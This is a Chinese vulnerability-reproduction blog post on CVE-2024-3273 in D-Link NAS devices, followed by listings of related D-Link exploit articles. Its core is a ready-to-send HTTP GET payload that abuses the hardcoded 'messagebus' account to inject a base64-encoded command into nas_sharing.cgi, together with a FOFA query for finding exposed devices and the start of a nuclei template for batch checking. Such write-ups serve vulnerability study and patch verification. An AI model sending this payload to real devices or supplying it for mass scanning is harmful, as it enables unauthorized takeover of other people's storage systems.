D-Link设备远程命令执行漏洞(CVE-2024-3273)

最新推荐文章于 2024-11-19 18:07:21 发布
原创 最新推荐文章于 2024-11-19 18:07:21 发布 · 774 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #服务器

漏洞描述

D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞

fofa语句

body="Text:In order to access the ShareCenter"

漏洞复现

打开页面

构造payload

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close

nuclei批量验证

id: D-Link-rce-CVE-2024-3273

info:
  name: D-Link-rce-CVE-2024-3273
  author: changge
最低0.47元/天 解锁文章

200万优质内容无限畅学
D-Link NAS 未授权RCE漏洞复现(CVE-2024-3273)
0xSec
04-09 1564
D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。
D-Link NAS account_mgr.cgi 未授权RCE漏洞复现(CVE-2024-10914)
iSee857的博客
11-12 769
漏洞是 `account_mgr.cgi` 脚本中的命令注入漏洞,允许远程攻击者通过特制的 HTTP GET 请求执行任意命令。同时该漏洞特别影响“account_mgr.cgi”脚本的“cgi_user_add”命令中的“name”参数。由于输入过滤不充分,注入“name”参数的恶意命令可能导致未经授权的命令执行。它适用于企业,可以作为企业云盘使用,为企业员工提供方便快捷的存储和共享服务‌。D-Link安全公告中确认将不提供CVE-2024-10914的补丁,并建议用户弃用易受攻击的产品。
D-link dsl-2750b远程代码执行 poc
04-30
D-link dsl-2750b远程代码执行,metersploit中使用,自己用的。
D-LinkNAS 远程命令执行漏洞CVE-2024-3273)RCE漏
bmaoHk的博客
09-30 1380
D-Link NAS(Network Attached Storage,网络附加存储)是一种连接到计算机网络的存储设备,它允许在网络上的多个设备之间共享和存储数据。D-Link 是一家知名的网络设备制造商,提供各种类型的 NAS 解决方案,适用于家庭和企业用户。攻击者可以通过这个后门帐户在没有合法用户授权的情况下访问NAS设备,进而获取存储在设备中的敏感数据,或者在设备上执行任意操作。当我们使用含有空格的命令,比如uname -a,cat /etc/passwd等时,空格会被过滤,命令无法执行成功。
最新系统漏洞--D-LINK DIR-3040远程代码执行漏洞
weixin_48555088的博客
11-15 1451
最新系统漏洞2021年11月14日 受影响系统: D-Link DIR-3040 1.13B03 描述: D-LINK DIR-3040是中国台湾友讯(D-Link)公司的一个路由器。提供连接网络的功能。 D-LINK DIR-3040 1.13B03的Libcli Test Environment功能存在远程代码执行漏洞。攻击者可借助特制的网络请求利用该漏洞导致任意命令执行。 建议: 厂商补丁: D-Link 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: https://www.dl
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273)
最新发布
m0_46381222的博客
11-19 1023
漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273)
D-Link DAP-1860:远程命令执行和认证绕过漏洞
NOSEC2019的博客
12-10 1001
介绍 2019年9月,我在D-Link Access Point(DAP-1860)上发现了两个漏洞,分别是命令注入导致的远程代码执行和身份验证绕过。这两个漏洞能帮助攻击者在不进行身份验证的情况下远程控制设备。如果你的上网设备是从D-Link购买的,并且型号是DAP-1860,请立刻更新固件或联系厂商寻求帮助,因为我发现的漏洞影响了当时最新版本的DAP-1860固件。 以下是DAP-1860的W...
D-Link 路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告.pdf
02-28
近日,国家信息安全漏洞共享平台(CNVD)收录了D-Link DIR系列路由器身份验证信息泄露漏洞远程命令执行漏洞(CNVD-2017-20002、CNVD-2017-20001)。远程攻击者利用漏洞可获取路由器后台登录凭证并执行任意代码。相关利用代码已在互联网公开,受到影响的设备数量根据标定超过20万台,有可能会诱发大规模的网络攻击
友讯(D-Link)、趋势网络路由器曝远程代码执行漏洞
weixin_34345560的博客
09-01 295
由于使用了Realtek瑞昱公司存在漏洞的软件开发工具包(SDK),友讯科技、趋势网络以及其他品牌路由器很容易被攻击者远程执行任意代码。 涉及企业 瑞昱公司(Realtek)、友讯科技(D-Link)、趋势网络(TRENDnet)及其他(更多受影响的厂商没有完整披露)漏洞详情 瑞昱miniigd SOAP服务器上存在一个严重缺陷。由于未能在执行系统...
D-Link RCE漏洞分析
weixin_43137410的博客
09-08 659
D-Link DSL-2888A 远程命令执行漏洞CVE-2020-24581/24579)
渗透之路,攻防之间皆学问
03-09 4773
漏洞详情 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。 漏洞影响 AU_2.31_V1.1.47ae55之前版本 EG_1.00b4 漏.
D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)
jammny
02-04 2892
漏洞详情 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。 漏洞影响 AU_2.31_V1.1.47ae55之前版本 EG_1.00b4 漏洞
D-Link DIR-645 信息泄露漏洞
weixin_30466039的博客
03-20 529
D-Link DIR-645getcfg.php文件由于过滤不严格导致信息泄露漏洞。 $SERVICE_COUNT = cut_count($_POST["SERVICES"], ","); TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]); $SERVICE_INDEX = 0...
[漏洞复现]D-Link未授权RCE漏洞复现(CVE-2024-3273)
KKleeeaa的博客
04-11 1398
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。如有侵权,请立即告知,我们将立即删除并致歉。D-Link nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,漏洞成因是通过硬编码帐户造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。0x02FOFA测绘。
保姆级CVE-2018-17066漏洞复现 DLink命令注入漏洞(更新完结)
weixin_51339377的博客
09-06 619
之后按照之前复现的方式一样 我们丢到kali中执行binwalk解析。之后为了模拟 可以在kali里安装qemu-mipsel。在bin目录下可以尝试将goahead的环境搭配好。固件官网可以进行下载。
Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析
weixin_44229639的博客
11-03 1357
Dlink路由器 CNVD-2018-01084复现分析 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞。该漏洞是由于service.cgi中拼接了HTTP POST请求中的数据,造成后台命令拼接,导致可执行任意命令。 cnvd上的漏洞说明:https://www.cnvd.org.cn/flaw/show/CNVD-2018-01084 在官网获取漏洞版本的固件:DIR645A1_FW102B08.bin 解压
WinRAR远程执行漏洞CVE-2023-38831解析及防范
根据提供的文件信息,以下是对CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC的详细知识点介绍: **标题知识点** 1. **CVE-2023-38831漏洞概述** - CVE是“Common Vulnerabilities and Exposures”的缩写,...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值